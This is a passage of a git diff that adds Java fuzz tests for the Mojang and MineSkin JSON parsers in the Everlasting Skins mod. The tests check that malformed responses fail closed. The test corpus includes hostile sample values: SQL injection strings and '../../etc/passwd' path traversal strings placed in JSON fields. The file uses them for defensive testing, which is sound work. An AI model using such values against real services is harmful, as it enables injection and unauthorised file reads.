+                sb.append('}');
+            }
+        } else {
+            sb.append("{\"a\":");
+            for (int i = 0; i < depth; i++) {
+                sb.append('[');
+            }
+            sb.append('1');
+            for (int i = 0; i < depth; i++) {
+                sb.append(']');
+            }
+            sb.append('}');
+        }
+        return sb.toString();
+    }
+
+    private static String oversizedDoc(int sel) {
+        switch (sel) {
+            case 0:
+                return "{\"k\":\"" + repeat('a', 1_100_000) + "\"}";
+            case 1:
+                return "{\"" + repeat('k', 100_000) + "\":\"v\"}";
+            case 2:
+                StringBuilder arr = new StringBuilder("{\"a\":[");
+                for (int i = 0; i < 50_000; i++) {
+                    arr.append("1,");
+                }
+                arr.append("1]}");
+                return arr.toString();
+            case 3:
+                return deepNestedDoc(3000);
+            case 4:
+                return repeat(' ', 200_000) + "{}";
+            case 5:
+                StringBuilder many = new StringBuilder("{");
+                for (int i = 0; i < 10_000; i++) {
+                    if (i > 0) {
+                        many.append(',');
+                    }
+                    many.append("\"a").append(i).append("\":").append(i);
+                }
+                many.append('}');
+                return many.toString();
+            default:
+                return "{\"k\":\"" + repeat("\\u0041", 100_000) + "\"}";
+        }
+    }
+
+    private static final String V2_DOC = "{\"skin\":{\"texture\":{\"data\":{\"value\":\"v\",\"signature\":\"s\"}},\"uuid\":\"u\",\"variant\":\"slim\"}}";
+
+    private static Arbitrary<String> v2Truncated() {
+        return Arbitraries.integers().between(0, V2_DOC.length() - 1).map(i -> V2_DOC.substring(0, i));
+    }
+
+    /** V2-shape failures whose value slot is empty/absent/null; hostile strings stay in inert fields. */
+    private static Arbitrary<String> v2Corrupted() {
+        return Arbitraries.of(
+                "{\"skin\":{\"texture\":{\"data\":{\"value\":\"\"}}}}",
+                "{\"skin\":{\"texture\":{\"data\":{\"value\":null}}}}",
+                "{\"skin\":{\"texture\":{\"data\":{}}}}",
+                "{\"skin\":{\"texture\":{}}}",
+                "{\"skin\":{}}",
+                "{\"skin\":{\"texture\":[]}}",
+                "{\"skin\":{\"texture\":{\"data\":{\"value\":\"\",\"signature\":\"' OR 1=1 --\"}},\"uuid\":\"../../etc/passwd\",\"variant\":\"slim\"}}",
+                "{\"skin\":{\"uuid\":\"' OR 1=1 --\",\"variant\":\"slim\",\"texture\":{\"data\":{\"value\":\"\"}}}}",
+                "{\"skin\":{\"texture\":{\"data\":{\"value\":\"\"}},\"uuid\":\"..%2F..%2Fetc%2Fpasswd\",\"variant\":\"x\"}}"
+        );
+    }
+
+    private static String rawLoneSurrogate() {
+        return "{\"k\":\"" + '\uD800' + "\"}";
+    }
+
+    private static String rawControlChar() {
+        return "{\"k\":\"" + '\u0001' + "\"}";
+    }
+
+    private static String rawNullByte() {
+        return "{\"k\":\"" + '\u0000' + "\"}";
+    }
+
+    private static String rawMalformedUtf8() {
+        String s = new String(new byte[]{(byte) 0xC3, (byte) 0x28}, StandardCharsets.UTF_8);
+        return "{\"k\":\"" + s + "\"}";
+    }
+
+    private static String overlongUtf8() {
+        String s = new String(new byte[]{(byte) 0xC0, (byte) 0xAF}, StandardCharsets.UTF_8);
+        return "{\"k\":\"" + s + "\"}";
+    }
+
+    private static String rawLatin1Bytes() {
+        String s = new String(new byte[]{(byte) 0x80, (byte) 0x9F, (byte) 0xFF},
+                java.nio.charset.Charset.forName("ISO-8859-1"));
+        return "{\"k\":\"" + s + "\"}";
+    }
+
+    private static String noiseHtml(int len) {
+        StringBuilder sb = new StringBuilder(len);
+        for (int i = 0; i < len; i++) {
+            sb.append((char) ('a' + (i * 31) % 26));
+        }
+        return sb.toString();
+    }
+
+    private static String repeat(char c, int n) {
+        StringBuilder sb = new StringBuilder(n);
+        for (int i = 0; i < n; i++) {
+            sb.append(c);
+        }
+        return sb.toString();
+    }
+
+    private static String repeat(String s, int n) {
+        StringBuilder sb = new StringBuilder(s.length() * n);
+        for (int i = 0; i < n; i++) {
+            sb.append(s);
+        }
+        return sb.toString();
+    }
+
+    /**
+     * Safety net: a candidate is corpus-safe when it fails closed under
+     * <b>both</b> Gson entry points — the lenient {@link JsonParser} (used by
+     * {@code JsonUtils.parseJson} and the MineSkin v2/rate-limit paths) and
+     * the strict {@code Gson#fromJson} (used by {@code HttpResponse.getBodyAs}):
+     * either it is malformed JSON (JsonSyntaxException on both paths) or it
+     * parses to an object-shaped document (hostile content stays inert data).
+     * <p>
+     * Documented exclusion (production finding, test-only PR): truncated
+     * {@code \u005CuXXXX} escapes (e.g. {@code {"k":"\u005Cu12"}}) make the strict
+     * {@code fromJson} throw a raw {@code NumberFormatException} instead of
+     * {@code JsonSyntaxException} — Gson 2.10.1 {@code JsonReader} gap — so
+     * {@code HttpResponse.getBodyAs} lets it escape. Such candidates are
+     * rejected here; the Mojang/MineSkin parsers need a follow-up fix round.
+     */
+    private static boolean parsesToObjectOrMalformed(String s) {
+        try {
+            JsonElement root = PARSE_FILTER.parse(s);
+            if (!root.isJsonObject()) {
+                return false;
+            }
+        } catch (JsonParseException e) {
+            // malformed under the lenient parser; strict path decides below
+        }
+        try {
+            Object strict = GSON.fromJson(s, Object.class);
+            return strict instanceof java.util.Map;
+        } catch (JsonSyntaxException e) {
+            return true; // malformed under the strict path too — fails closed everywhere
+        } catch (RuntimeException e) {
+            return false; // strict path fails open (raw NFE etc.) — not corpus-safe
+        }
+    }
+}

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MalformedJsonCorpus.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MalformedJsonCorpus.java
@@ -7,10 +7,6 @@
 package levosilimo.everlastingskins.skinchanger;
 
 import com.google.gson.Gson;
-import com.google.gson.JsonElement;
-import com.google.gson.JsonParser;
-import com.google.gson.JsonParseException;
-import com.google.gson.JsonSyntaxException;
 import levosilimo.everlastingskins.enums.SkinVariant;
 import net.jqwik.api.Arbitraries;
 import net.jqwik.api.Arbitrary;
@@ -39,16 +35,15 @@ import java.util.UUID;
  * <p>
  * Corpus contract (what the properties are allowed to feed the parsers):
  * <ul>
- *   <li>Every input is either malformed JSON (Gson raises JsonSyntaxException,
- *       which {@code HttpResponse.getBodyAs} swallows) or valid JSON with an
+ *   <li>Every input is either malformed JSON (Gson raises
+ *       JsonSyntaxException, which {@code HttpResponse.getBodyAs} swallows),
+ *       valid JSON whose root is not an object, or valid JSON with an
  *       <b>object</b> root whose hostile content stays inert data.</li>
- *   <li>Valid non-object roots ({@code [1,2]}, {@code 1}, {@code "x"},
- *       {@code null}, {@code NaN} as a whole document) are excluded: they make
- *       {@code JsonObject#getAsJsonObject} throw {@code IllegalStateException},
- *       a fail-open escape in the MineSkin v2/rate-limit paths that is a
- *       documented production finding, not a malformed-bytes shape. The
- *       {@link #malformedJson()} mix re-filters every candidate as a safety
- *       net.</li>
+ *   <li>Truncated {@code \\uXXXX} escapes and valid non-object roots
+ *       ({@code [1,2]}, {@code 1}, {@code "x"}, {@code null}, {@code NaN} as
+ *       a whole document) are exercised directly: Gson internals raise raw
+ *       NumberFormatException and IllegalStateException on these shapes, and
+ *       every HTTP parser fails closed on them (round-9 production fix).</li>
  *   <li>No input parses to a complete result: hostile values only land in
  *       scalar fields, never as a valid 32-hex UUID or a complete textures
  *       property, so the {@code returnsEmpty} properties assert a real
@@ -66,7 +61,6 @@ public final class MalformedJsonCorpus {
     }
 
     private static final Gson GSON = new Gson();
-    private static final JsonParser PARSE_FILTER = new JsonParser();
 
     /** The exact marker {@link RandomMojangSkin} scans for. */
     private static final String SPAN_OPENER = "<span class=\"card-title green-text truncate\">";
@@ -190,7 +184,7 @@ public final class MalformedJsonCorpus {
                 Tuple.of(10, invalidUnicode()),
                 Tuple.of(4, oversized()),
                 Tuple.of(20, hostileValues())
-        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+        );
     }
 
     /** MineSkin v2-shape failures: truncated v2 documents plus the universal mix. */
@@ -199,7 +193,7 @@ public final class MalformedJsonCorpus {
                 Tuple.of(15, malformedJson()),
                 Tuple.of(10, v2Truncated()),
                 Tuple.of(10, v2Corrupted())
-        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+        );
     }
 
     /** MineSkin rate-limit bodies that must fail closed to a zero wait. */
@@ -207,7 +201,7 @@ public final class MalformedJsonCorpus {
         return Arbitraries.frequencyOf(
                 Tuple.of(70, malformedJson()),
                 Tuple.of(30, Arbitraries.of(RATE_LIMIT_DOCS))
-        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+        );
     }
 
     /** Valid JSON with hostile string values; used by the injection-inertness property. */
@@ -253,7 +247,6 @@ public final class MalformedJsonCorpus {
                 Arbitraries.strings()
                         .withChars('[', ']', '{', '}', '"', ':', ',', '1', '2', ' ', 'a', 'n', 'u', 'l', 't', 'r', 'e', '0')
                         .ofMinLength(1).ofMaxLength(48)
-                        .filter(MalformedJsonCorpus::parsesToObjectOrMalformed)
         );
     }
 
@@ -541,39 +534,5 @@ public final class MalformedJsonCorpus {
             sb.append(s);
         }
         return sb.toString();
-    }
-
-    /**
-     * Safety net: a candidate is corpus-safe when it fails closed under
-     * <b>both</b> Gson entry points — the lenient {@link JsonParser} (used by
-     * {@code JsonUtils.parseJson} and the MineSkin v2/rate-limit paths) and
-     * the strict {@code Gson#fromJson} (used by {@code HttpResponse.getBodyAs}):
-     * either it is malformed JSON (JsonSyntaxException on both paths) or it
-     * parses to an object-shaped document (hostile content stays inert data).
-     * <p>
-     * Documented exclusion (production finding, test-only PR): truncated
-     * {@code \u005CuXXXX} escapes (e.g. {@code {"k":"\u005Cu12"}}) make the strict
-     * {@code fromJson} throw a raw {@code NumberFormatException} instead of
-     * {@code JsonSyntaxException} — Gson 2.10.1 {@code JsonReader} gap — so
-     * {@code HttpResponse.getBodyAs} lets it escape. Such candidates are
-     * rejected here; the Mojang/MineSkin parsers need a follow-up fix round.
-     */
-    private static boolean parsesToObjectOrMalformed(String s) {
-        try {
-            JsonElement root = PARSE_FILTER.parse(s);
-            if (!root.isJsonObject()) {
-                return false;
-            }
-        } catch (JsonParseException e) {
-            // malformed under the lenient parser; strict path decides below
-        }
-        try {
-            Object strict = GSON.fromJson(s, Object.class);
-            return strict instanceof java.util.Map;
-        } catch (JsonSyntaxException e) {
-            return true; // malformed under the strict path too — fails closed everywhere
-        } catch (RuntimeException e) {
-            return false; // strict path fails open (raw NFE etc.) — not corpus-safe
-        }
     }
 }

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MineSkinApiFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MineSkinApiFuzzTest.java
@@ -1,0 +1,190 @@
+/*
+ * SPDX-License-Identifier: MIT
+ * Copyright (c) 2025 Levosilimo
+ * https://github.com/Levosilimo/Everlasting-Skins
+ */
+
+package levosilimo.everlastingskins.skinchanger;
+
+import levosilimo.everlastingskins.FakeHttpClient;
+import levosilimo.everlastingskins.enums.SkinVariant;
+import levosilimo.everlastingskins.metrics.SkinMetrics;
+import levosilimo.everlastingskins.skinchanger.responses.mineskin.MineSkinResponse;
+import levosilimo.everlastingskins.util.EndpointsConfig;
+import net.jqwik.api.ForAll;
+import net.jqwik.api.From;
+import net.jqwik.api.Label;
+import net.jqwik.api.Property;
+import net.jqwik.api.Provide;
+import net.jqwik.api.lifecycle.BeforeProperty;
+
+import java.net.URI;
+import java.util.Optional;
+
+import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+/**
+ * Fuzz corpus for the MineSkin API response parsers (V1 success shape,
+ * V2 success shape, rate-limit shape). Every property feeds malformed JSON
+ * byte shapes from {@link MalformedJsonCorpus} and asserts the fail-closed
+ * contract: "no result" (empty or terminal null) and no exception escapes.
+ * <p>
+ * Properties drive {@code genSkinInternal} directly (one HTTP round trip,
+ * no retry loop), so the retry sleeps in {@code genSkin} never run and a
+ * malformed 429 body resolving to a non-zero wait would be caught as a
+ * delay metric instead of stalling the suite.
+ * <p>
+ * All HTTP responses are served by {@link FakeHttpClient}; no live endpoint
+ * is ever contacted.
+ */
+class MineSkinApiFuzzTest {
+
+    private static final URI MINESKIN_URI = EndpointsConfig.getURI("endpoint.mineskin.generate");
+    private static final String IMAGE_URL = "https://example.com/skin.png";
+
+    /**
+     * Serializes the delay-metric properties: jqwik may shrink a failing
+     * property on a background thread while the next property's tries run,
+     * so the shared SkinMetrics counters need a mutual-exclusion fence.
+     */
+    private static final Object METRICS_LOCK = new Object();
+
+    private FakeHttpClient httpClient;
+    private MineSkinApiHttpImpl api;
+
+    @BeforeProperty
+    void setUp() {
+        httpClient = new FakeHttpClient();
+        // A configured key keeps the properties off the empty-key config-warning path.
+        api = new MineSkinApiHttpImpl(httpClient, "test-api-key");
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> malformedJson() {
+        return MalformedJsonCorpus.malformedJson();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> v2Malformed() {
+        return MalformedJsonCorpus.v2Malformed();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> rateLimitMalformed() {
+        return MalformedJsonCorpus.rateLimitMalformed();
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  C1: V1 success-shape parse                                         */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * HTTP 200 with malformed bytes: the V1 deserialization
+     * ({@code MineSkinUrlResponse}) must fail closed to "no result" and
+     * never let an exception escape.
+     */
+    @Property(tries = 100)
+    @Label("C1: MineSkin V1 response parses malformed bytes to empty, never throws")
+    void parseMineSkinResponse_v1_malformedBytes_returnsEmpty(
+            @ForAll @From("malformedJson") String bytes) {
+        httpClient.addResponse(MINESKIN_URI, 200, bytes);
+
+        Optional<MineSkinResponse> result = assertDoesNotThrow(() ->
+                api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC));
+
+        assertTrue(!result.isPresent(),
+                () -> "malformed bytes produced a V1 skin: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  C2: V2 success-shape parse                                         */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * HTTP 200 with malformed V2-shaped bodies (truncated v2 documents and
+     * corrupted v2 shapes whose value slot is empty, absent or null): the
+     * {@code JsonUtils.parseJson}-based V2 path must fail closed to "no
+     * result" and never let an exception escape.
+     */
+    @Property(tries = 100)
+    @Label("C2: MineSkin V2 response parses malformed bytes to empty, never throws")
+    void parseMineSkinResponse_v2_malformedBytes_returnsEmpty(
+            @ForAll @From("v2Malformed") String bytes) {
+        httpClient.addResponse(MINESKIN_URI, 200, bytes);
+
+        Optional<MineSkinResponse> result = assertDoesNotThrow(() ->
+                api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC));
+
+        assertTrue(!result.isPresent(),
+                () -> "malformed bytes produced a V2 skin: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  C3: rate-limit shape parse                                         */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * HTTP 429 with malformed bytes: the rate-limit parsers (V1
+     * {@code MineSkinErrorDelayResponse} and the V2 {@code rateLimit.next}
+     * shapes) must fail closed to a zero wait — no exception escapes, the
+     * result is empty, and no delay is recorded on {@link SkinMetrics}
+     * (observable proof that no provider-controlled sleep was scheduled).
+     */
+    @Property(tries = 100)
+    @Label("C3: MineSkin rate-limit parses malformed bytes to zero wait, never throws")
+    void parseMineSkinRateLimit_malformedBytes_returnsZeroOrDefault(
+            @ForAll @From("rateLimitMalformed") String bytes) {
+        synchronized (METRICS_LOCK) {
+            SkinMetrics.INSTANCE.reset();
+            httpClient.addResponse(MINESKIN_URI, 429, bytes);
+
+            Optional<MineSkinResponse> result = assertDoesNotThrow(() ->
+                    api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC));
+
+            assertTrue(!result.isPresent(),
+                    () -> "malformed rate-limit bytes produced a result: " + excerpt(bytes));
+            assertEquals(0, SkinMetrics.INSTANCE.snapshot().mineSkinDelayTotalMs(),
+                    () -> "malformed rate-limit bytes scheduled a wait: " + excerpt(bytes));
+        }
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  C4: no exception escapes across the whole parse surface            */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Malformed bytes served under every status code the MineSkin API
+     * classifies (200, 400, 401, 403, 404, 429, 500) must never escape any
+     * parse path as an exception, and a malformed 429 body must never
+     * schedule a provider-controlled sleep.
+     */
+    @Property(tries = 60)
+    @Label("C4: malformed bytes never escape any MineSkin API parse entry point")
+    void parseMineSkinApiResponse_malformedBytes_noExceptionEscapes(
+            @ForAll @From("malformedJson") String bytes) {
+        synchronized (METRICS_LOCK) {
+            SkinMetrics.INSTANCE.reset();
+            int[] statuses = {200, 400, 401, 403, 404, 429, 500};
+            for (int status : statuses) {
+                httpClient.addResponse(MINESKIN_URI, status, bytes);
+                assertDoesNotThrow(() -> api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC),
+                        () -> "status " + status + " escaped on: " + excerpt(bytes));
+            }
+            assertEquals(0, SkinMetrics.INSTANCE.snapshot().mineSkinDelayTotalMs(),
+                    () -> "malformed 429 bytes scheduled a wait: " + excerpt(bytes));
+        }
+    }
+
+    /* ================================================================== */
+    /*  Helpers                                                           */
+    /* ================================================================== */
+
+    private static String excerpt(String bytes) {
+        if (bytes.length() <= 96) {
+            return bytes;
+        }
+        return bytes.substring(0, 96) + "…(" + bytes.length() + " bytes)";
+    }
+}

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MineSkinApiFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MineSkinApiFuzzTest.java
@@ -76,6 +76,20 @@ class MineSkinApiFuzzTest {
         return MalformedJsonCorpus.rateLimitMalformed();
     }
 
+    @Provide
+    net.jqwik.api.Arbitrary<String> nonObjectRootJson() {
+        // Valid JSON whose root is not an object; the strict Gson fromJson
+        // raises IllegalStateException on every one of these shapes.
+        return net.jqwik.api.Arbitraries.of(
+                "\"not-an-object\"",
+                "1",
+                "[1,2]",
+                "null",
+                "true",
+                "NaN"
+        );
+    }
+
     /* ------------------------------------------------------------------ */
     /*  C1: V1 success-shape parse                                         */
     /* ------------------------------------------------------------------ */
@@ -174,6 +188,52 @@ class MineSkinApiFuzzTest {
             }
             assertEquals(0, SkinMetrics.INSTANCE.snapshot().mineSkinDelayTotalMs(),
                     () -> "malformed 429 bytes scheduled a wait: " + excerpt(bytes));
+        }
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  C5/C6: valid non-object roots (raw IllegalStateException)          */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * A valid non-object root (e.g. a bare string) makes the strict Gson
+     * {@code fromJson} throw IllegalStateException ("Expected
+     * BEGIN_OBJECT...") and the V2 {@code JsonUtils} path throw on
+     * {@code getAsJsonObject}; both escaped the parsers before the round-9
+     * production fix. The V2 parse path must fail closed to "no result".
+     */
+    @Property(tries = 20)
+    @Label("C5: MineSkin V2 response fails closed on valid non-object roots, never throws")
+    void parseMineSkinResponse_v2_nonObjectRoot_returnsEmpty(
+            @ForAll @From("nonObjectRootJson") String bytes) {
+        httpClient.addResponse(MINESKIN_URI, 200, bytes);
+
+        Optional<MineSkinResponse> result = assertDoesNotThrow(() ->
+                api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC));
+
+        assertTrue(!result.isPresent(),
+                () -> "non-object root produced a V2 skin: " + excerpt(bytes));
+    }
+
+    /**
+     * A valid non-object root served as a 429 rate-limit body must resolve
+     * to a zero wait: no exception escapes and no delay is scheduled.
+     */
+    @Property(tries = 20)
+    @Label("C6: MineSkin rate-limit fails closed on valid non-object roots, never throws")
+    void parseMineSkinRateLimit_nonObjectRoot_returnsZero(
+            @ForAll @From("nonObjectRootJson") String bytes) {
+        synchronized (METRICS_LOCK) {
+            SkinMetrics.INSTANCE.reset();
+            httpClient.addResponse(MINESKIN_URI, 429, bytes);
+
+            Optional<MineSkinResponse> result = assertDoesNotThrow(() ->
+                    api.genSkinInternal(IMAGE_URL, SkinVariant.CLASSIC));
+
+            assertTrue(!result.isPresent(),
+                    () -> "non-object root produced a rate-limit result: " + excerpt(bytes));
+            assertEquals(0, SkinMetrics.INSTANCE.snapshot().mineSkinDelayTotalMs(),
+                    () -> "non-object root scheduled a wait: " + excerpt(bytes));
         }
     }
 

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MojangApiFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MojangApiFuzzTest.java
@@ -1,0 +1,180 @@
+/*
+ * SPDX-License-Identifier: MIT
+ * Copyright (c) 2025 Levosilimo
+ * https://github.com/Levosilimo/Everlasting-Skins
+ */
+
+package levosilimo.everlastingskins.skinchanger;
+
+import levosilimo.everlastingskins.FakeHttpClient;
+import levosilimo.everlastingskins.skinchanger.responses.mojang.MojangSkinDataResult;
+import levosilimo.everlastingskins.util.CustomSkinProperty;
+import net.jqwik.api.ForAll;
+import net.jqwik.api.From;
+import net.jqwik.api.Label;
+import net.jqwik.api.Property;
+import net.jqwik.api.Provide;
+import net.jqwik.api.lifecycle.BeforeProperty;
+
+import java.net.URI;
+import java.util.Optional;
+import java.util.UUID;
+
+import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+/**
+ * Fuzz corpus for the Mojang API JSON parsers (AI-generated code surface,
+ * cf. Pearce et al., S&P 2022). Every property feeds malformed JSON byte
+ * shapes from {@link MalformedJsonCorpus} to the UUID and profile parsers
+ * and asserts the fail-closed contract: the result is {@link Optional#EMPTY}
+ * ("no result") and no exception escapes the public API.
+ * <p>
+ * The malformed corpus never contains a valid 32-hex UUID or a complete
+ * textures property (see the corpus contract), so {@code returnsEmpty} is a
+ * real fail-closed assertion, not a base64 semantic check.
+ * <p>
+ * All HTTP responses are served by {@link FakeHttpClient}; no live endpoint
+ * is ever contacted.
+ */
+class MojangApiFuzzTest {
+
+    private static final String PLAYER_NAME = "FuzzPlayer";
+    private static final UUID PLAYER_UUID = UUID.fromString("12345678-1234-1234-1234-123456789abc");
+    private static final String NO_DASH_UUID = "12345678123412341234123456789abc";
+
+    private static final MojangEndpoints TEST_ENDPOINTS = new MojangEndpoints(
+            "http://test.local/uuid/mojang/%playerName%",
+            "http://test.local/uuid/minetools/%playerName%",
+            "http://test.local/session/profile/mojang/%uuid%",
+            "http://test.local/profile/minetools/%uuid%"
+    );
+
+    private URI mojangUuidUri;
+    private URI mineToolsUuidUri;
+    private URI mojangProfileUri;
+    private URI mineToolsProfileUri;
+
+    private FakeHttpClient httpClient;
+    private MojangApiHttpImpl api;
+
+    @BeforeProperty
+    void setUp() {
+        mojangUuidUri = URI.create("http://test.local/uuid/mojang/" + PLAYER_NAME);
+        mineToolsUuidUri = URI.create("http://test.local/uuid/minetools/" + PLAYER_NAME);
+        mojangProfileUri = URI.create("http://test.local/session/profile/mojang/" + NO_DASH_UUID);
+        mineToolsProfileUri = URI.create("http://test.local/profile/minetools/" + NO_DASH_UUID);
+
+        httpClient = new FakeHttpClient();
+        api = new MojangApiHttpImpl(TEST_ENDPOINTS, httpClient);
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> malformedJson() {
+        return MalformedJsonCorpus.malformedJson();
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  B1: UUID response parse                                            */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * The UUID endpoint (Mojang {@code /uuid/...} and the MineTools fallback)
+     * serves malformed bytes with HTTP 200. The parser must fail closed: the
+     * result is empty and no exception escapes the lookup.
+     */
+    @Property(tries = 100)
+    @Label("B1: Mojang UUID response parses malformed bytes to empty, never throws")
+    void parseMojangUuidResponse_malformedBytes_returnsEmpty(
+            @ForAll @From("malformedJson") String bytes) {
+        httpClient.addResponse(mojangUuidUri, 200, bytes);
+        httpClient.addResponse(mineToolsUuidUri, 200, bytes);
+
+        Optional<UUID> result = assertDoesNotThrow(() -> api.getUUID(PLAYER_NAME));
+
+        assertTrue(!result.isPresent(),
+                () -> "malformed bytes produced a UUID: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  B2: Mojang profile response parse                                  */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * The profile endpoint (Mojang and MineTools fallback) serves malformed
+     * bytes with HTTP 200. The texture-property extraction must fail closed.
+     */
+    @Property(tries = 100)
+    @Label("B2: Mojang profile response parses malformed bytes to empty, never throws")
+    void parseMojangProfileResponse_malformedBytes_returnsEmpty(
+            @ForAll @From("malformedJson") String bytes) {
+        httpClient.addResponse(mojangProfileUri, 200, bytes);
+        httpClient.addResponse(mineToolsProfileUri, 200, bytes);
+
+        Optional<CustomSkinProperty> result = assertDoesNotThrow(() ->
+                api.getProfile(new ProfileLookup(PLAYER_NAME, PLAYER_UUID)));
+
+        assertTrue(!result.isPresent(),
+                () -> "malformed bytes produced a skin property: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  B3: session profile parse (getSkin by UUID)                        */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * The sessionserver-shaped profile response is parsed on the
+     * {@code getSkin} UUID path, which skips the username/UUID resolution
+     * and goes straight to the session profile lookup. Malformed bytes must
+     * yield "no result" without an exception escape.
+     */
+    @Property(tries = 100)
+    @Label("B3: session profile parse on the getSkin UUID path fails closed")
+    void parseMojangSessionProfile_malformedBytes_returnsEmpty(
+            @ForAll @From("malformedJson") String bytes) {
+        httpClient.addResponse(mojangProfileUri, 200, bytes);
+
+        Optional<MojangSkinDataResult> result = assertDoesNotThrow(() ->
+                api.getSkin(PLAYER_UUID.toString()));
+
+        assertTrue(!result.isPresent(),
+                () -> "malformed bytes produced a skin result: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  B4: no exception escapes across the whole parse surface            */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Every public parse entry point must swallow malformed bytes: no
+     * exception (checked or unchecked) may escape, regardless of which
+     * provider is serving the corrupted body.
+     */
+    @Property(tries = 60)
+    @Label("B4: malformed bytes never escape any Mojang API parse entry point")
+    void parseMojangApiResponse_malformedBytes_noExceptionEscapes(
+            @ForAll @From("malformedJson") String bytes) {
+        httpClient.addResponse(mojangUuidUri, 200, bytes);
+        httpClient.addResponse(mineToolsUuidUri, 200, bytes);
+        httpClient.addResponse(mojangProfileUri, 200, bytes);
+        httpClient.addResponse(mineToolsProfileUri, 200, bytes);
+
+        assertDoesNotThrow(() -> api.getUUID(PLAYER_NAME),
+                () -> "getUUID escaped on: " + excerpt(bytes));
+        assertDoesNotThrow(() -> api.getProfile(new ProfileLookup(PLAYER_NAME, PLAYER_UUID)),
+                () -> "getProfile escaped on: " + excerpt(bytes));
+        assertDoesNotThrow(() -> api.getSkin(PLAYER_UUID.toString()),
+                () -> "getSkin escaped on: " + excerpt(bytes));
+    }
+
+    /* ================================================================== */
+    /*  Helpers                                                           */
+    /* ================================================================== */
+
+    private static String excerpt(String bytes) {
+        if (bytes.length() <= 96) {
+            return bytes;
+        }
+        return bytes.substring(0, 96) + "…(" + bytes.length() + " bytes)";
+    }
+}

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MojangApiFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MojangApiFuzzTest.java
@@ -74,6 +74,19 @@ class MojangApiFuzzTest {
         return MalformedJsonCorpus.malformedJson();
     }
 
+    @Provide
+    net.jqwik.api.Arbitrary<String> truncatedEscapeJson() {
+        // Truncated \\uXXXX escapes; the strict Gson fromJson raises a raw
+        // NumberFormatException on every one of these shapes.
+        return net.jqwik.api.Arbitraries.of(
+                "{\"id\":\"\\u12\"}",
+                "{\"id\":\"\\u1\"}",
+                "{\"id\":\"\\u\"}",
+                "{\"id\":\"\\u12\\u\"}",
+                "{\"id\":\"\\uZZZZ\"}"
+        );
+    }
+
     /* ------------------------------------------------------------------ */
     /*  B1: UUID response parse                                            */
     /* ------------------------------------------------------------------ */
@@ -165,6 +178,30 @@ class MojangApiFuzzTest {
                 () -> "getProfile escaped on: " + excerpt(bytes));
         assertDoesNotThrow(() -> api.getSkin(PLAYER_UUID.toString()),
                 () -> "getSkin escaped on: " + excerpt(bytes));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  B5: truncated \\uXXXX escapes (raw NumberFormatException)          */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Truncated {@code \\uXXXX} escapes (e.g. {@code {"id":"\\u12"}}) make
+     * the strict Gson {@code fromJson} throw a raw NumberFormatException
+     * instead of JsonSyntaxException, which escaped the parsers before the
+     * round-9 production fix. The UUID lookup must fail closed on every
+     * variant.
+     */
+    @Property(tries = 20)
+    @Label("B5: truncated \\uXXXX escapes fail closed on the Mojang UUID lookup")
+    void parseMojangUuidResponse_truncatedEscape_returnsEmpty(
+            @ForAll @From("truncatedEscapeJson") String bytes) {
+        httpClient.addResponse(mojangUuidUri, 200, bytes);
+        httpClient.addResponse(mineToolsUuidUri, 200, bytes);
+
+        Optional<UUID> result = assertDoesNotThrow(() -> api.getUUID(PLAYER_NAME));
+
+        assertTrue(!result.isPresent(),
+                () -> "truncated escape produced a UUID: " + excerpt(bytes));
     }
 
     /* ================================================================== */

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/RandomMojangSkinFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/RandomMojangSkinFuzzTest.java
@@ -1,0 +1,147 @@
+/*
+ * SPDX-License-Identifier: MIT
+ * Copyright (c) 2025 Levosilimo
+ * https://github.com/Levosilimo/Everlasting-Skins
+ */
+
+package levosilimo.everlastingskins.skinchanger;
+
+import net.jqwik.api.ForAll;
+import net.jqwik.api.From;
+import net.jqwik.api.Label;
